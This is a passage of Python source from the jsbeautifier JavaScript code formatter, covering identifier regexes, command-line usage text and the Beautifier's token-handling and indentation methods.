\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e2f\u3005-\u3007\u3021-\u3029\u3031-\u3035\u3038-\u303c\u3041-\u3096\u309d-\u309f\u30a1-\u30fa\u30fc-\u30ff\u3105-\u312d\u3131-\u318e\u31a0-\u31ba\u31f0-\u31ff\u3400-\u4db5\u4e00-\u9fcc\ua000-\ua48c\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a\ua62b\ua640-\ua66e\ua67f-\ua697\ua6a0-\ua6ef\ua717-\ua71f\ua722-\ua788\ua78b-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8f7\ua8fb\ua90a-\ua925\ua930-\ua946\ua960-\ua97c\ua984-\ua9b2\ua9cf\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa60-\uaa76\uaa7a\uaa80-\uaaaf\uaab1\uaab5\uaab6\uaab9-\uaabd\uaac0\uaac2\uaadb-\uaadd\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\uf900-\ufa6d\ufa70-\ufad9\ufb00-\ufb06\ufb13-\ufb17\ufb1d\ufb1f-\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40\ufb41\ufb43\ufb44\ufb46-\ufbb1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufe70-\ufe74\ufe76-\ufefc\uff21-\uff3a\uff41-\uff5a\uff66-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc")
self.nonASCIIidentifierChars = self.six.u("\u0300-\u036f\u0483-\u0487\u0591-\u05bd\u05bf\u05c1\u05c2\u05c4\u05c5\u05c7\u0610-\u061a\u0620-\u0649\u0672-\u06d3\u06e7-\u06e8\u06fb-\u06fc\u0730-\u074a\u0800-\u0814\u081b-\u0823\u0825-\u0827\u0829-\u082d\u0840-\u0857\u08e4-\u08fe\u0900-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962-\u0963\u0966-\u096f\u0981-\u0983\u09bc\u09be-\u09c4\u09c7\u09c8\u09d7\u09df-\u09e0\u0a01-\u0a03\u0a3c\u0a3e-\u0a42\u0a47\u0a48\u0a4b-\u0a4d\u0a51\u0a66-\u0a71\u0a75\u0a81-\u0a83\u0abc\u0abe-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ae2-\u0ae3\u0ae6-\u0aef\u0b01-\u0b03\u0b3c\u0b3e-\u0b44\u0b47\u0b48\u0b4b-\u0b4d\u0b56\u0b57\u0b5f-\u0b60\u0b66-\u0b6f\u0b82\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd7\u0be6-\u0bef\u0c01-\u0c03\u0c46-\u0c48\u0c4a-\u0c4d\u0c55\u0c56\u0c62-\u0c63\u0c66-\u0c6f\u0c82\u0c83\u0cbc\u0cbe-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5\u0cd6\u0ce2-\u0ce3\u0ce6-\u0cef\u0d02\u0d03\u0d46-\u0d48\u0d57\u0d62-\u0d63\u0d66-\u0d6f\u0d82\u0d83\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2\u0df3\u0e34-\u0e3a\u0e40-\u0e45\u0e50-\u0e59\u0eb4-\u0eb9\u0ec8-\u0ecd\u0ed0-\u0ed9\u0f18\u0f19\u0f20-\u0f29\u0f35\u0f37\u0f39\u0f41-\u0f47\u0f71-\u0f84\u0f86-\u0f87\u0f8d-\u0f97\u0f99-\u0fbc\u0fc6\u1000-\u1029\u1040-\u1049\u1067-\u106d\u1071-\u1074\u1082-\u108d\u108f-\u109d\u135d-\u135f\u170e-\u1710\u1720-\u1730\u1740-\u1750\u1772\u1773\u1780-\u17b2\u17dd\u17e0-\u17e9\u180b-\u180d\u1810-\u1819\u1920-\u192b\u1930-\u193b\u1951-\u196d\u19b0-\u19c0\u19c8-\u19c9\u19d0-\u19d9\u1a00-\u1a15\u1a20-\u1a53\u1a60-\u1a7c\u1a7f-\u1a89\u1a90-\u1a99\u1b46-\u1b4b\u1b50-\u1b59\u1b6b-\u1b73\u1bb0-\u1bb9\u1be6-\u1bf3\u1c00-\u1c22\u1c40-\u1c49\u1c5b-\u1c7d\u1cd0-\u1cd2\u1d00-\u1dbe\u1e01-\u1f15\u200c\u200d\u203f\u2040\u2054\u20d0-\u20dc\u20e1\u20e5-\u20f0\u2d81-\u2d96\u2de0-\u2dff\u3021-\u3028\u3099\u309a\ua640-\ua66d\ua674-\ua67d\ua69f\ua6f0-\ua6f1\ua7f8-\ua800\ua806\ua80b\ua823-\ua827\ua880-\ua881\ua8b4-\ua8c4\ua8d0-\ua8d9\ua8f3-\ua8f7\ua900-\ua909\ua926-\ua92d\ua930-\ua945\ua980-\ua983\ua9b3-\ua9c0\uaa00-\uaa27\uaa40-\uaa41\uaa4c-\uaa4d\uaa50-\uaa59\uaa7b\uaae0-\uaae9\uaaf2-\uaaf3\uabc0-\uabe1\uabec\uabed\uabf0-\uabf9\ufb20-\ufb28\ufe00-\ufe0f\ufe20-\ufe26\ufe33\ufe34\ufe4d-\ufe4f\uff10-\uff19\uff3f")
self.nonASCIIidentifierStart = re.compile("[" + self.nonASCIIidentifierStartChars + "]")
self.nonASCIIidentifier = re.compile("[" + self.nonASCIIidentifierStartChars + self.nonASCIIidentifierChars + "]")
# Whether a single character denotes a newline.
self.newline = re.compile(self.six.u("[\n\r\u2028\u2029]"))
# Matches a whole line break (where CRLF is considered a single
# line break). Used to count lines.
self.lineBreak = re.compile(self.six.u("\r\n|[\n\r\u2028\u2029]"))
# Test whether a given character code starts an identifier.
def isIdentifierStart(self, code):
if code < 65:
return code == 36
if code < 91:
return True
if code < 97:
return code == 95
if code < 123:
return True
return code >= 0xaa and self.nonASCIIidentifierStart.match(self.six.unichr(code)) != None
# Test whether a given character is part of an identifier.
def isIdentifierChar(self, code):
if code < 48:
return code == 36
if code < 58:
return True
if code < 65:
return False
if code < 91:
return True
if code < 97:
return code == 95
if code < 123:
return True
return code >= 0xaa and self.nonASCIIidentifier.match(self.six.unichr(code)) != None
class Token:
def __init__(self, type, text, newlines = 0, whitespace_before = '', mode = None, parent = None):
self.type = type
self.text = text
self.comments_before = []
self.newlines = newlines
self.wanted_newline = newlines > 0
self.whitespace_before = whitespace_before
self.parent = None
self.directives = None
def default_options():
return BeautifierOptions()
def beautify(string, opts = default_options() ):
b = Beautifier()
return b.beautify(string, opts)
def beautify_file(file_name, opts = default_options() ):
if file_name == '-': # stdin
stream = sys.stdin
else:
stream = open(file_name)
return beautify(''.join(stream.readlines()), opts)
def usage(stream=sys.stdout):
print("jsbeautifier.py@" + __version__ + """
Javascript beautifier (http://jsbeautifier.org/)
Usage: jsbeautifier.py [options] <infile>
<infile> can be "-", which means stdin.
<outfile> defaults to stdout
Input options:
-i, --stdin read input from stdin
Output options:
-s, --indent-size=NUMBER indentation size. (default 4).
-c, --indent-char=CHAR character to indent with. (default space).
-e, --eol=STRING character(s) to use as line terminators. (default newline - "\\n")
-t, --indent-with-tabs Indent with tabs, overrides -s and -c
-d, --disable-preserve-newlines do not preserve existing line breaks.
-P, --space-in-paren add padding spaces within paren, ie. f( a, b )
-E, --space-in-empty-paren Add a single space inside empty paren, ie. f( )
-j, --jslint-happy more jslint-compatible output
-a, --space_after_anon_function add a space before an anonymous function's parens, ie. function ()
-b, --brace-style=collapse brace style (collapse, expand, end-expand)
-k, --keep-array-indentation keep array indentation.
-r, --replace write output in-place, replacing input
-o, --outfile=FILE specify a file to output to (default stdout)
-f, --keep-function-indentation Do not re-indent function bodies defined in var lines.
-x, --unescape-strings Decode printable chars encoded in \\xNN notation.
-X, --e4x Pass E4X xml literals through untouched
-w, --wrap-line-length Attempt to wrap line when it exceeds this length.
NOTE: Line continues until next wrap point is found.
-n, --end_with_newline End output with newline
Rarely needed options:
--eval-code evaluate code if a JS interpreter is
installed. May be useful with some obfuscated
script but poses a potential security issue.
-l, --indent-level=NUMBER initial indentation level. (default 0).
-h, --help, --usage prints this help statement.
-v, --version Show the version
""", file=stream)
if stream == sys.stderr:
return 1
else:
return 0
class MODE:
BlockStatement, Statement, ObjectLiteral, ArrayLiteral, \
ForInitializer, Conditional, Expression = range(7)
class Beautifier:
def __init__(self, opts = default_options() ):
self.opts = copy.copy(opts)
self.blank_state()
self.acorn = Acorn()
def blank_state(self, js_source_text = None):
# internal flags
self.flags = None
self.previous_flags = None
self.flag_store = []
self.tokens = []
self.token_pos = 0
# force opts.space_after_anon_function to true if opts.jslint_happy
if self.opts.jslint_happy:
self.opts.space_after_anon_function = True
if self.opts.indent_with_tabs:
self.opts.indent_char = "\t"
self.opts.indent_size = 1
self.opts.eol = self.opts.eol.replace('\\r', '\r').replace('\\n', '\n')
self.indent_string = self.opts.indent_char * self.opts.indent_size
self.baseIndentString = ''
self.last_type = 'TK_START_BLOCK' # last token type
self.last_last_text = '' # pre-last token text
preindent_index = 0;
if not js_source_text == None and len(js_source_text) > 0:
while preindent_index < len(js_source_text) and \
js_source_text[preindent_index] in [' ', '\t'] :
self.baseIndentString += js_source_text[preindent_index]
preindent_index += 1
js_source_text = js_source_text[preindent_index:]
self.output = Output(self.indent_string, self.baseIndentString)
# If testing the ignore directive, start with output disable set to true
self.output.raw = self.opts.test_output_raw;
self.set_mode(MODE.BlockStatement)
return js_source_text
def beautify(self, s, opts = None ):
if opts != None:
self.opts = copy.copy(opts)
if self.opts.brace_style not in ['expand', 'collapse', 'end-expand', 'none']:
raise(Exception('opts.brace_style must be "expand", "collapse", "end-expand", or "none".'))
s = self.blank_state(s)
input = self.unpack(s, self.opts.eval_code)
self.handlers = {
'TK_START_EXPR': self.handle_start_expr,
'TK_END_EXPR': self.handle_end_expr,
'TK_START_BLOCK': self.handle_start_block,
'TK_END_BLOCK': self.handle_end_block,
'TK_WORD': self.handle_word,
'TK_RESERVED': self.handle_word,
'TK_SEMICOLON': self.handle_semicolon,
'TK_STRING': self.handle_string,
'TK_EQUALS': self.handle_equals,
'TK_OPERATOR': self.handle_operator,
'TK_COMMA': self.handle_comma,
'TK_BLOCK_COMMENT': self.handle_block_comment,
'TK_COMMENT': self.handle_comment,
'TK_DOT': self.handle_dot,
'TK_UNKNOWN': self.handle_unknown,
'TK_EOF': self.handle_eof
}
self.tokens = Tokenizer(input, self.opts, self.indent_string).tokenize()
self.token_pos = 0
while not self.get_token() == None:
local_token = self.get_token()
for comment_token in local_token.comments_before:
# The cleanest handling of inline comments is to treat them as though they aren't there.
# Just continue formatting and the behavior should be logical.
# Also ignore unknown tokens. Again, this should result in better behavior.
self.handle_token(comment_token)
self.handle_token(local_token)
self.last_last_text = self.flags.last_text
self.last_type = local_token.type
self.flags.last_text = local_token.text
self.token_pos += 1
sweet_code = self.output.get_code()
if self.opts.end_with_newline:
sweet_code += '\n'
if not self.opts.eol == '\n':
sweet_code = sweet_code.replace('\n', self.opts.eol)
return sweet_code
def handle_token(self, local_token):
newlines = local_token.newlines
keep_whitespace = self.opts.keep_array_indentation and self.is_array(self.flags.mode)
if keep_whitespace:
for i in range(newlines):
self.print_newline(i > 0)
else: # not keep_whitespace
if self.opts.max_preserve_newlines != 0 and newlines > self.opts.max_preserve_newlines:
newlines = self.opts.max_preserve_newlines
if self.opts.preserve_newlines and newlines > 1:
self.print_newline()
for i in range(1, newlines):
self.print_newline(True)
self.handlers[local_token.type](local_token)
def unpack(self, source, evalcode=False):
import jsbeautifier.unpackers as unpackers
try:
return unpackers.run(source, evalcode)
except unpackers.UnpackingError as error:
print('error:', error)
return ''
def is_special_word(self, s):
return s in ['case', 'return', 'do', 'if', 'throw', 'else']
def is_array(self, mode):
return mode == MODE.ArrayLiteral
def is_expression(self, mode):
return mode in [MODE.Expression, MODE.ForInitializer, MODE.Conditional]
def allow_wrap_or_preserved_newline(self, current_token, force_linewrap = False):
# never wrap the first token of a line.
if self.output.just_added_newline():
return
if (self.opts.preserve_newlines and current_token.wanted_newline) or force_linewrap:
self.print_newline(preserve_statement_flags = True)
elif self.opts.wrap_line_length > 0:
proposed_line_length = self.output.current_line.get_character_count() + len(current_token.text)
if self.output.space_before_token:
proposed_line_length += 1
if proposed_line_length >= self.opts.wrap_line_length:
self.print_newline(preserve_statement_flags = True)
def print_newline(self, force_newline = False, preserve_statement_flags = False):
if not preserve_statement_flags:
if self.flags.last_text != ';' and self.flags.last_text != ',' and self.flags.last_text != '=' and self.last_type != 'TK_OPERATOR':
while self.flags.mode == MODE.Statement and not self.flags.if_block and not self.flags.do_block:
self.restore_mode()
if self.output.add_new_line(force_newline):
self.flags.multiline_frame = True
def print_token_line_indentation(self, current_token):
if self.output.just_added_newline():
line = self.output.current_line
if self.opts.keep_array_indentation and self.is_array(self.flags.mode) and current_token.wanted_newline:
line.push(current_token.whitespace_before)
self.output.space_before_token = False
elif self.output.set_indent(self.flags.indentation_level):
self.flags.line_indent_level = self.flags.indentation_level
def print_token(self, current_token, s=None):
if self.output.raw:
self.output.add_raw_token(current_token)
return
if self.opts.comma_first and self.last_type == 'TK_COMMA' and self.output.just_added_newline():
if self.output.previous_line.last() == ',':
self.output.previous_line.pop()
self.print_token_line_indentation(current_token)
self.output.add_token(',')
self.output.space_before_token = True
if s == None:
s = current_token.text
self.print_token_line_indentation(current_token)
self.output.add_token(s);
def indent(self):
self.flags.indentation_level += 1
def deindent(self):
allow_deindent = self.flags.indentation_level > 0 and ((self.flags.parent == None) or self.flags.indentation_level > self.flags.parent.indentation_level)
if allow_deindent:
self.flags.indentation_level -= 1
def set_mode(self, mode):
if self.flags:
self.flag_store.append(self.flags)
self.previous_flags = self.flags
else:
self.previous_flags = BeautifierFlags(mode)
self.flags = BeautifierFlags(mode)
self.flags.apply_base(self.previous_flags, self.output.just_added_newline())
self.flags.start_line_index = self.output.get_line_number();
def restore_mode(self):
if len(self.flag_store) > 0:
self.previous_flags = self.flags
self.flags = self.flag_store.pop()
if self.previous_flags.mode == MODE.Statement:
self.output.remove_redundant_indentation(self.previous_flags)
def start_of_object_property(self):
return self.flags.parent.mode == MODE.ObjectLiteral and self.flags.mode == MODE.Statement and \
((self.flags.last_text == ':' and self.flags.ternary_depth == 0) or (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['get', 'set']))
def start_of_statement(self, current_token):
if (
(self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const'] and current_token.type == 'TK_WORD') \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text== 'do') \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text== 'return' and not current_token.wanted_newline) \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text == 'else' and not (current_token.type == 'TK_RESERVED' and current_token.text == 'if' )) \
or (self.last_type == 'TK_END_EXPR' and (self.previous_flags.mode == MODE.ForInitializer or self.previous_flags.mode == MODE.Conditional)) \
or (self.last_type == 'TK_WORD' and self.flags.mode == MODE.BlockStatement \
and not self.flags.in_case
and not (current_token.text == '--' or current_token.text == '++')
and self.last_last_text != 'function'
and current_token.type != 'TK_WORD' and current_token.type != 'TK_RESERVED') \
or (self.flags.mode == MODE.ObjectLiteral and \
((self.flags.last_text == ':' and self.flags.ternary_depth == 0) or (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['get', 'set'])))
):
self.set_mode(MODE.Statement)
self.indent()
if self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const'] and current_token.type == 'TK_WORD':
self.flags.declaration_statement = True
# Issue #276:
# If starting a new statement with [if, for, while, do], push to a new line.
# if (a) if (b) if(c) d(); else e(); else f();
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(current_token, current_token.type == 'TK_RESERVED' and current_token.text in ['do', 'for', 'if', 'while'])
return True
else:
return False
def get_token(self, offset = 0):
index = self.token_pos + offset
if index < 0 or index >= len(self.tokens):
return None
else:
return self.tokens[index]
def handle_start_expr(self, current_token):
if self.start_of_statement(current_token):
# The conditional starts the statement if appropriate.
pass
next_mode = MODE.Expression
if current_token.text == '[':
if self.last_type == 'TK_WORD' or self.flags.last_text == ')':
if self.last_type == 'TK_RESERVED' and self.flags.last_text in Tokenizer.line_starters:
self.output.space_before_token = True
self.set_mode(next_mode)
self.print_token(current_token)
self.indent()
if self.opts.space_in_paren:
self.output.space_before_token = True
return
next_mode = MODE.ArrayLiteral
if self.is_array(self.flags.mode):
if self.flags.last_text == '[' or (
self.flags.last_text == ',' and (self.last_last_text == ']' or self.last_last_text == '}')):
# ], [ goes to a new line
# }, [ goes to a new line
if not self.opts.keep_array_indentation:
self.print_newline()
else:
if self.last_type == 'TK_RESERVED' and self.flags.last_text == 'for':
next_mode = MODE.ForInitializer
elif self.last_type == 'TK_RESERVED' and self.flags.last_text in ['if', 'while']:
next_mode = MODE.Conditional
else:
next_mode = MODE.Expression
if self.flags.last_text == ';' or self.last_type == 'TK_START_BLOCK':
self.print_newline()
elif self.last_type in ['TK_END_EXPR', 'TK_START_EXPR', 'TK_END_BLOCK'] or self.flags.last_text == '.':
# do nothing on (( and )( and ][ and ]( and .(
# TODO: Consider whether forcing this is required. Review failing tests when removed.
self.allow_wrap_or_preserved_newline(current_token, current_token.wanted_newline)
elif not (self.last_type == 'TK_RESERVED' and current_token.text == '(') and self.last_type not in ['TK_WORD', 'TK_OPERATOR']:
self.output.space_before_token = True
elif (self.last_type == 'TK_RESERVED' and (self.flags.last_word == 'function' or self.flags.last_word == 'typeof')) or \
(self.flags.last_text == '*' and self.last_last_text =='function'):
# function() vs function (), typeof() vs typeof ()
if self.opts.space_after_anon_function:
self.output.space_before_token = True
elif self.last_type == 'TK_RESERVED' and (self.flags.last_text in Tokenizer.line_starters or self.flags.last_text == 'catch'):
# TODO: option space_before_conditional
self.output.space_before_token = True
elif current_token.text == '(' and self.last_type == 'TK_RESERVED' and self.flags.last_word == 'await':
self.output.space_before_token = True
# Support of this kind of newline preservation:
# a = (b &&
# (c || d));
if self.last_type in ['TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(current_token)
self.set_mode(next_mode)
self.print_token(current_token)
if self.opts.space_in_paren:
self.output.space_before_token = True
# In all cases, if we newline while inside an expression it should be indented.
self.indent()
def handle_end_expr(self, current_token):
# statements inside expressions are not valid syntax, but...
# statements must all be closed when their container closes
while self.flags.mode == MODE.Statement:
self.restore_mode()
if self.flags.multiline_frame:
self.allow_wrap_or_preserved_newline(current_token, current_token.text == ']' and self.is_array(self.flags.mode) and not self.opts.keep_array_indentation)
if self.opts.space_in_paren:
if self.last_type == 'TK_START_EXPR' and not self.opts.space_in_empty_paren:
# empty parens are always "()" and "[]", not "( )" or "[ ]"
self.output.space_before_token = False
self.output.trim()
else:
self.output.space_before_token = True
if current_token.text == ']' and self.opts.keep_array_indentation:
self.print_token(current_token)
self.restore_mode()
else:
self.restore_mode()
self.print_token(current_token)
self.output.remove_redundant_indentation(self.previous_flags)
# do {} while () // no statement required after
if self.flags.do_while and self.previous_flags.mode == MODE.Conditional:
self.previous_flags.mode = MODE.Expression
self.flags.do_block = False
self.flags.do_while = False
def handle_start_block(self, current_token):
# Check if this is a BlockStatement that should be treated as a ObjectLiteral
next_token = self.get_token(1)
second_token = self.get_token(2)
if second_token != None and \
((second_token.text == ':' and next_token.type in ['TK_STRING', 'TK_WORD', 'TK_RESERVED']) \
or (next_token.text in ['get', 'set'] and second_token.type in ['TK_WORD', 'TK_RESERVED'])):
# We don't support TypeScript,but we didn't break it for a very long time.
# We'll try to keep not breaking it.
if not self.last_last_text in ['class','interface']:
self.set_mode(MODE.ObjectLiteral);
else:
self.set_mode(MODE.BlockStatement)
else:
self.set_mode(MODE.BlockStatement)
empty_braces = (not next_token == None) and len(next_token.comments_before) == 0 and next_token.text == '}'
empty_anonymous_function = empty_braces and self.flags.last_word == 'function' and \
self.last_type == 'TK_END_EXPR'
if self.opts.brace_style == 'expand' or \
(self.opts.brace_style == 'none' and current_token.wanted_newline):
if self.last_type != 'TK_OPERATOR' and \
(empty_anonymous_function or
self.last_type == 'TK_EQUALS' or
(self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text) and self.flags.last_text != 'else')):
self.output.space_before_token = True
else:
self.print_newline(preserve_statement_flags = True)
else: # collapse
if self.last_type not in ['TK_OPERATOR', 'TK_START_EXPR']:
if self.last_type == 'TK_START_BLOCK':
self.print_newline()
else:
self.output.space_before_token = True
else:
# if TK_OPERATOR or TK_START_EXPR
if self.is_array(self.previous_flags.mode) and self.flags.last_text == ',':
if self.last_last_text == '}':
self.output.space_before_token = True
else:
self.print_newline()
self.print_token(current_token)
self.indent()
def handle_end_block(self, current_token):
# statements must all be closed when their container closes
while self.flags.mode == MODE.Statement:
self.restore_mode()
empty_braces = self.last_type == 'TK_START_BLOCK'
if self.opts.brace_style == 'expand':
if not empty_braces:
self.print_newline()
else:
# skip {}
if not empty_braces:
if self.is_array(self.flags.mode) and self.opts.keep_array_indentation:
self.opts.keep_array_indentation = False
self.print_newline()
self.opts.keep_array_indentation = True
else:
self.print_newline()
self.restore_mode()
self.print_token(current_token)
def handle_word(self, current_token):
if current_token.type == 'TK_RESERVED' and self.flags.mode != MODE.ObjectLiteral and \
current_token.text in ['set', 'get']:
current_token.type = 'TK_WORD'
if current_token.type == 'TK_RESERVED' and self.flags.mode == MODE.ObjectLiteral:
next_token = self.get_token(1)
if next_token.text == ':':
current_token.type = 'TK_WORD'
if self.start_of_statement(current_token):
# The conditional starts the statement if appropriate.
pass
elif current_token.wanted_newline and \
not self.is_expression(self.flags.mode) and \
(self.last_type != 'TK_OPERATOR' or (self.flags.last_text == '--' or self.flags.last_text == '++')) and \
self.last_type != 'TK_EQUALS' and \
(self.opts.preserve_newlines or not (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const', 'set', 'get'])):
self.print_newline()
if self.flags.do_block and not self.flags.do_while:
if current_token.type == 'TK_RESERVED' and current_token.text == 'while':
# do {} ## while ()
self.output.space_before_token = True
self.print_token(current_token)
self.output.space_before_token = True
self.flags.do_while = True
return
else:
# do {} should always have while as the next word.
# if we don't see the expected while, recover
self.print_newline()
self.flags.do_block = False
# if may be followed by else, or not
# Bare/inline ifs are tricky
# Need to unwind the modes correctly: if (a) if (b) c(); else d(); else e();
if self.flags.if_block:
if (not self.flags.else_block) and (current_token.type == 'TK_RESERVED' and current_token.text == 'else'):
self.flags.else_block = True
else:
while self.flags.mode == MODE.Statement:
self.restore_mode()
self.flags.if_block = False
if current_token.type == 'TK_RESERVED' and (current_token.text == 'case' or (current_token.text == 'default' and self.flags.in_case_statement)):
self.print_newline()
if self.flags.case_body or self.opts.jslint_happy:
self.flags.case_body = False
self.deindent()
self.print_token(current_token)
self.flags.in_case = True
self.flags.in_case_statement = True
return
if current_token.type == 'TK_RESERVED' and current_token.text == 'function':
if self.flags.last_text in ['}', ';'] or (self.output.just_added_newline() and not self.flags.last_text in ['[', '{', ':', '=', ',']):
# make sure there is a nice clean space of at least one blank line
# before a new function definition, except in arrays
if not self.output.just_added_blankline() and len(current_token.comments_before) == 0:
self.print_newline()
self.print_newline(True)
if self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD':
if self.last_type == 'TK_RESERVED' and self.flags.last_text in ['get', 'set', 'new', 'return', 'export', 'async']:
self.output.space_before_token = True
elif self.last_type == 'TK_RESERVED' and self.flags.last_text == 'default' and self.last_last_text == 'export':
self.output.space_before_token = True
else:
self.print_newline()
elif self.last_type == 'TK_OPERATOR' or self.flags.last_text == '=':
# foo = function
self.output.space_before_token = True
elif not self.flags.multiline_frame and (self.is_expression(self.flags.mode) or self.is_array(self.flags.mode)):
# (function
pass
else:
self.print_newline()
if self.last_type in ['TK_COMMA', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(current_token)
if current_token.type == 'TK_RESERVED' and current_token.text in ['function', 'get', 'set']:
self.print_token(current_token)
self.flags.last_word = current_token.text
return
prefix = 'NONE'
if self.last_type == 'TK_END_BLOCK':
if not (current_token.type == 'TK_RESERVED' and current_token.text in ['else', 'catch', 'finally']):
prefix = 'NEWLINE'
else:
if self.opts.brace_style in ['expand', 'end-expand'] or \
(self.opts.brace_style == 'none' and current_token.wanted_newline):
prefix = 'NEWLINE'
else:
prefix = 'SPACE'
self.output.space_before_token = True
elif self.last_type == 'TK_SEMICOLON' and self.flags.mode == MODE.BlockStatement:
# TODO: Should this be for STATEMENT as well?
prefix = 'NEWLINE'
elif self.last_type == 'TK_SEMICOLON' and self.is_expression(self.flags.mode):
prefix = 'SPACE'
elif self.last_type == 'TK_STRING':
prefix = 'NEWLINE'
elif self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD' or \
(self.flags.last_text == '*' and self.last_last_text == 'function'):
prefix = 'SPACE'
elif self.last_type == 'TK_START_BLOCK':
prefix = 'NEWLINE'
elif self.last_type == 'TK_END_EXPR':
self.output.space_before_token = True
prefix = 'NEWLINE'
if current_token.type == 'TK_RESERVED' and current_token.text in Tokenizer.line_starters and self.flags.last_text != ')':
if self.flags.last_text == 'else ' or self.flags.last_text == 'export':
prefix = 'SPACE'
else:
prefix = 'NEWLINE'
if current_token.type == 'TK_RESERVED' and current_token.text in ['else', 'catch', 'finally']:
if self.last_type != 'TK_END_BLOCK' \
or self.opts.brace_style == 'expand' \
or self.opts.brace_style == 'end-expand' \
or (self.opts.brace_style == 'none' and current_token.wanted_newline):
self.print_newline()
else:
self.output.trim(True)
# If we trimmed and there's something other than a close block before us
# put a newline back in. Handles '} // comment' scenario.
if self.output.current_line.last() != '}':
self.print_newline()
self.output.space_before_token = True
elif prefix == 'NEWLINE':
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
# no newline between return nnn
self.output.space_before_token = True
elif self.last_type != 'TK_END_EXPR':
if (self.last_type != 'TK_START_EXPR' or not (current_token.type == 'TK_RESERVED' and current_token.text in ['var', 'let', 'const'])) and self.flags.last_text != ':':
# no need to force newline on VAR -
# for (var x = 0...
if current_token.type == 'TK_RESERVED' and current_token.text == 'if' and self.flags.last_text == 'else':
self.output.space_before_token = True
else:
self.print_newline()
elif current_token.type == 'TK_RESERVED' and current_token.text in Tokenizer.line_starters and self.flags.last_text != ')':
self.print_newline()
elif self.flags.multiline_frame and self.is_array(self.flags.mode) and self.flags.last_text == ',' and self.last_last_text == '}':
self.print_newline() # }, in lists get a newline
elif prefix == 'SPACE':
self.output.space_before_token = True
self.print_token(current_token)
self.flags.last_word = current_token.text
if current_token.type == 'TK_RESERVED' and current_token.text == 'do':
self.flags.do_block = True
if current_token.type == 'TK_RESERVED' and current_token.text == 'if':
self.flags.if_block = True
def handle_semicolon(self, current_token):
if self.start_of_statement(current_token):
# The conditional starts the statement if appropriate.
# Semicolon can be the start (and end) of a statement
self.output.space_before_token = False
while self.flags.mode == MODE.Statement and not self.flags.if_block and not self.flags.do_block:
self.restore_mode()
self.print_token(current_token)
def handle_string(self, current_token):
if self.start_of_statement(current_token):
# The conditional starts the statement if appropriate.
# One difference - strings want at least a space before
self.output.space_before_token = True
elif self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD':
self.output.space_before_token = True
elif self.last_type in ['TK_COMMA', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(current_token)
else:
self.print_newline()
self.print_token(current_token)
def handle_equals(self, current_token):
if self.start_of_statement(current_token):
# The conditional starts the statement if appropriate.
pass
if self.flags.declaration_statement:
# just got an '=' in a var-line, different line breaking rules will apply
self.flags.declaration_assignment = True
self.output.space_before_token = True
self.print_token(current_token)
self.output.space_before_token = True
def handle_comma(self, current_token):
if self.flags.declaration_statement:
if self.is_expression(self.flags.parent.mode):
# do not break on comma, for ( var a = 1, b = 2
self.flags.declaration_assignment = False
self.print_token(current_token)
if self.flags.declaration_assignment:
self.flags.declaration_assignment = False
self.print_newline(preserve_statement_flags = True)
else:
self.output.space_before_token = True
# for comma-first, we want to allow a newline before the comma
# to turn into a newline after the comma, which we will fixup later
if self.opts.comma_first:
self.allow_wrap_or_preserved_newline(current_token)
return
self.print_token(current_token)
if self.flags.mode == MODE.ObjectLiteral \
or (self.flags.mode == MODE.Statement and self.flags.parent.mode == MODE.ObjectLiteral):
if self.flags.mode == MODE.Statement:
self.restore_mode()
self.print_newline()
else:
# EXPR or DO_BLOCK
self.output.space_before_token = True
# for comma-first, we want to allow a newline before the comma
# to turn into a newline after the comma, which we will fixup later
if self.opts.comma_first:
self.allow_wrap_or_preserved_newline(current_token)
def handle_operator(self, current_token):
if self.start_of_statement(current_token):
# The conditional starts the statement if appropriate.
pass
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
# return had a special handling in TK_WORD
self.output.space_before_token = True
self.print_token(current_token)
return
# hack for actionscript's import .*;
if current_token.text == '*' and self.last_type == 'TK_DOT':
self.print_token(current_token)
return
if current_token.text == ':' and self.flags.in_case:
self.flags.case_body = True
self.indent()
self.print_token(current_token)
self.print_newline()
self.flags.in_case = False
return
if current_token.text == '::':
# no spaces around the exotic namespacing syntax operator
self.print_token(current_token)
return
# Allow line wrapping between operators in an expression
if self.last_type == 'TK_OPERATOR':
